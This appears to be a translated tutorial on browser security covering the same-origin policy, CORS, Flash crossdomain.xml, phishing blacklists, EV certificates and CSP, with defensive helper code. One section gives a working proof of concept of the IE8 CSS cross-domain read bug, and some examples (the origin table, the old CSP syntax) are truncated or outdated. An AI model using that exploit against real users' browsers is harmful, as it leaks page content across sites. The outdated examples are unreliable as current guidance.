Preface

In recent years the browser has become the biggest entrance to the Internet: for the vast majority of users, the tool they use to access the Internet is the browser. If the browser has security functions, it therefore goes a long way toward protecting users when they go online.

One, Same-origin policy

1. What is the same-origin policy

The same-origin policy is a convention; it is the core and most basic security function of the browser. Without the same-origin policy, the normal functioning of the browser would be affected. It can be said that the Web is built on the same-origin policy, and browsers are simply implementations of it.

The browser's same-origin policy restricts documents or scripts from different origins from reading or setting certain properties of the current document.

Without a same-origin policy, assuming a.com has a JavaScript script, a.com could modify b.com's page at will (as displayed in the browser) even though b.com never loaded that script. To keep page behaviour in the browser from becoming chaotic, browsers came up with the concept of an "origin": objects from different origins cannot interfere with each other.

For JavaScript, examples of what counts as the same origin and as a different origin:

URL                              Result            Reason
store.shen.com/dir2/index….      Same origin
store.shen.com/dir/inner/a…      Same origin
store.shen.com/test2.html        Different origin  Different protocol
store.shen.com:81/dir/inner/a…   Different origin  Different port
new.shen.com/dir/inner/a…        Different origin  Different host

The factors that make up an origin include the domain name, IP address, subdomain, port, and protocol.


Note:

For the current page, what matters is not the domain where the JS file is stored, but the domain of the page that loads the JS.

In simple terms, 1.com uses the following code:

<script src="http://2.com/2.js"></script>

2.js is hosted on 2.com, but it runs inside a 1.com page, so for the currently opened page (1.com) the origin of the script is 1.com.

2. XMLHttpRequest Same-origin policy

The XMLHttpRequest object provides full access to the HTTP protocol, including the ability to make POST and HEAD requests as well as plain GET requests. XMLHttpRequest can return the response from the Web server synchronously or asynchronously, and can return the content as text or as a DOM document.

Principle

In the browser, XMLHttpRequest can access content from the same origin, but it cannot access resources across domains.

Later, the W3C developed a standard for XMLHttpRequest cross-domain access (CORS). The target domain must authorize cross-domain access through the HTTP headers it returns, since HTTP headers are generally not controllable by JS. The security of this cross-domain scheme rests on the trust that "JS cannot control HTTP headers".

The Origin field indicates the origin (protocol + domain name + port) from which the request is sent. Based on this value, the server decides whether to approve the request. The value of Access-Control-Allow-Origin is either the Origin value sent with the request or *, meaning that requests from any domain are accepted.
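The origin comparison from section 1 and the server side of the CORS exchange above, as an added example that is not code from the original article; the hostnames are constructed samples and corsAllowOrigin is a hypothetical helper:

```javascript
// Added example, not code from the original article: the origin tuple the
// browser compares under the same-origin policy (section 1) and the server
// side of the CORS exchange described in section 2. Hostnames are samples.

// Normalize a URL to its origin: scheme + host + port (default port filled in).
function originOf(urlString) {
  const u = new URL(urlString);
  const defaults = { "http:": "80", "https:": "443" };
  const port = u.port || defaults[u.protocol] || "";
  return `${u.protocol}//${u.hostname.toLowerCase()}:${port}`;
}

// Two URLs are same-origin only when scheme, host and port all match;
// the path (dir/, dir2/, ...) plays no part in the decision.
function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Server side of CORS: the browser fills in the Origin request header (page
// JS cannot forge it) and the server answers Access-Control-Allow-Origin only
// for origins it trusts. Returns the response headers to add, or null to
// leave the browser's default cross-origin denial in place.
function corsAllowOrigin(requestOrigin, allowlist) {
  if (typeof requestOrigin !== "string") return null; // no Origin header sent
  let normalized;
  try {
    normalized = originOf(requestOrigin);
  } catch (e) {
    return null; // malformed Origin value: deny
  }
  // Compare whole normalized origins, never prefixes or substrings, so a host
  // that merely starts with an allowed name is not accepted.
  if (!allowlist.some((o) => originOf(o) === normalized)) return null;
  // Echo the specific origin rather than "*", and tell caches that the
  // response depends on the Origin header.
  return { "Access-Control-Allow-Origin": requestOrigin, Vary: "Origin" };
}
```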

3. Flash plug-in same-origin policy

For browsers, the DOM, cookies, and XMLHttpRequest are all restricted by the same-origin policy. Some third-party browser plug-ins, such as Flash and Java applets, also have their own same-origin policies.

Principle

Flash decides whether the Flash of the current origin may access the target resource across domains based on the crossdomain.xml file provided by the target website.

For example, if the browser loads a Flash file that accesses www.test.com from any other domain, Flash checks whether the policy file exists on www.test.com. If the file exists, it checks whether the domain that originated the request is within the permitted scope.

<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*.test.com" />
  <allow-access-from domain="*.test.net" />
  <allow-access-from domain="*.test2.com" />
  <allow-access-from domain="*.test.cn" />
  <allow-access-from domain="*.test1.com" />
</cross-domain-policy>

In the policy file above, only the domains listed in allow-access-from tags are permitted.

Flash 9 and later also validate crossdomain.xml by MIME type, for instance checking that the Content-Type of the HTTP response is text/*, application/xml, and so on. An attacker who can upload a crossdomain.xml file could control Flash's behaviour and bypass the same-origin policy. Besides the MIME check, Flash also checks whether crossdomain.xml is in the site's root directory, which defeats some upload attacks.

4. IE8 CSS cross-domain vulnerability test

The browser's same-origin policy can itself have flaws that allow it to be bypassed. Below we test the IE8 CSS cross-domain vulnerability.

Server A deployment

http://192.168.163.131/a.html

<body>
{}body{font-family:
yyyyyyyyyyyyyyy
bbbbbbbbbbbbbbb
</body>

Server B deployment

http://192.168.163.132/b.html

<style>@import url("http://192.168.163.131/a.html");</style>
<script>
setTimeout(function () {
  var a = document.body.currentStyle.fontFamily;
  alert(a);
}, 2000);
</script>

Open http://192.168.163.132/b.html in Internet Explorer 8 or an earlier version to run the test.

A pop-up appears showing the contents of a.html. In theory, var x = document.body.currentStyle.fontFamily; returns as the font-family value whatever text followed font-family: in a.html; in the author's run this was a string along the lines of 'x', 'body', 'color: RGB (0, 0, 0); font-size: 14px !important;'.

As mentioned earlier, tags such as <script> and <style> can only load resources; they cannot read or write the content of those resources. This vulnerability, however, makes cross-domain reading of page content possible. How it could be used is a matter of opinion.

Two, Malicious website interception

1. The principle of malicious website interception

Malicious code inserted into a web page that exploits browser vulnerabilities to execute arbitrary code is known as a drive-by attack ("hanging a horse", 挂马).

A drive-by attack can compromise browser security. In many cases, a drive-by attack is delivered through a normal web page.

Trojan ("horse") sites: usually contain malicious scripts such as JS or Flash that exploit browser vulnerabilities to execute shellcode.

Phishing sites: sites that imitate the pages of well-known sites in order to trick users.

The browser periodically fetches an updated blacklist of malicious websites from the server. If the user visits a website on the blacklist, the browser displays a warning page.

PhishTank is one of the organizations on the Internet that provides a free blacklist of malicious websites.

https://phishtank.org/index.php

2. Brief introduction to the EV SSL certificate

EV SSL, also known as an EV SSL Certificate or Extended Validation SSL Certificate, is a stringent new validation standard for SSL certificates, jointly developed by the world's leading digital certificate authorities and mainstream browser vendors.

Extended Validation SSL certificates (EV SSL) are the highest level of SSL digital certificate. The main feature of EV SSL is that it turns the browser's address bar green, using a prominent sign to tell users that the site is protected by the strictest information security standard.

At the same time, the EV SSL certificate complies with the X.509 standard and is compatible with ordinary certificates: if the browser does not support EV mode, the certificate is treated as an ordinary certificate; if the browser does support it, the EV status is shown in the address bar.

(Figure: EV certificate shown in Internet Explorer)

(Figure: no EV certificate in Internet Explorer)

The green address bar display can be used to combat phishing sites.

Three, Content Security Policy (CSP)

1. Content Security Policy (CSP) principle

As Web risks grew, browsers introduced the concept of a Content Security Policy (CSP) to mitigate cross-site scripting attacks.

In simple terms, the developer explicitly tells the client (by specifying strict policies and rules) which external resources may be loaded and executed, so that even if an attacker finds a vulnerability, he cannot inject a script.

Developers can use this tool to lock down their applications in a variety of ways, reducing the risk of content injection vulnerabilities such as cross-site scripting and reducing the privileges with which their applications execute.

2. How to enable CSP

CSP is enabled through the Content-Security-Policy HTTP header:

Content-Security-Policy: policy

where policy is the string that describes the rules.

Example 1:

Content-Security-Policy: allow 'self' *.qq.com

The browser trusts content from its own origin and from qq.com and its subdomains.

Example 2:

Content-Security-Policy: allow 'self'; img-src *; media-src qq.com; script-src test.com

In addition to trusting its own origin, the browser may load images from any domain, media files from qq.com, and scripts from test.com, and refuses everything else.
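Evaluating the host allowlists that both the crossdomain.xml file of section 3 and the CSP header above express, as an added example that is not the article's own code; the sample policies and domains are constructed, hostMatches, crossdomainAllows, parseCsp and cspAllows are hypothetical helpers, and the CSP part is written with the standardized default-src directive rather than the early allow keyword used in the examples above:

```javascript
// Added example, not the article's own code: evaluating the host allowlists
// of crossdomain.xml (section 3) and a CSP header (this section). Samples are
// constructed; CSP is written with default-src, which replaced the early "allow".

// Constructed crossdomain.xml with the single rule the check below needs.
const SAMPLE_CROSSDOMAIN =
  '<?xml version="1.0"?><cross-domain-policy>' +
  '<allow-access-from domain="*.test.com" /></cross-domain-policy>';

// Does a host pattern ("*", "*.qq.com" or "qq.com") match a host?
// Assumption: a leading "*." matches subdomains and the bare domain itself.
function hostMatches(pattern, host) {
  const p = pattern.toLowerCase(), h = host.toLowerCase();
  if (p === "*") return true;
  if (p.startsWith("*.")) return h === p.slice(2) || h.endsWith(p.slice(1));
  return h === p;
}

// crossdomain.xml: the requesting domain must match some allow-access-from tag.
function crossdomainAllows(policyXml, host) {
  const re = /<allow-access-from\s+[^>]*domain="([^"]+)"/g;
  for (let m = re.exec(policyXml); m !== null; m = re.exec(policyXml)) {
    if (hostMatches(m[1], host)) return true;
  }
  return false; // no matching tag: Flash refuses the cross-domain read
}

// CSP: "directive src ...; directive src ..." -> { directive: [sources] }
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// May a page at pageOrigin load url under directive (e.g. "script-src")? Falls
// back to default-src; simplified host matching on hostname only (no scheme/port/path).
function cspAllows(policy, directive, pageOrigin, url) {
  const sources = policy[directive] || policy["default-src"];
  if (!sources) return true; // nothing restricts this resource type
  const target = new URL(url);
  return sources.some((src) => {
    const s = src.replace(/^'|'$/g, "").toLowerCase();
    if (s === "self") return target.origin === pageOrigin;
    return hostMatches(s.replace(/^https?:\/\//, ""), target.hostname);
  });
}
```

A directive that is absent and has no default-src fallback restricts nothing, which is why a policy without default-src is weaker than it looks.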

Four, Summary

The browser is an important entrance to the Internet. Amid the endless stream of Web security incidents, the security of the browser is a top priority. Browser security is built on the same-origin policy, and only by understanding the same-origin policy can we grasp the essence of browser security. In this chapter we introduced the principles of the same-origin policy and the Content Security Policy (CSP) in detail, and analysed how browsers block malicious websites.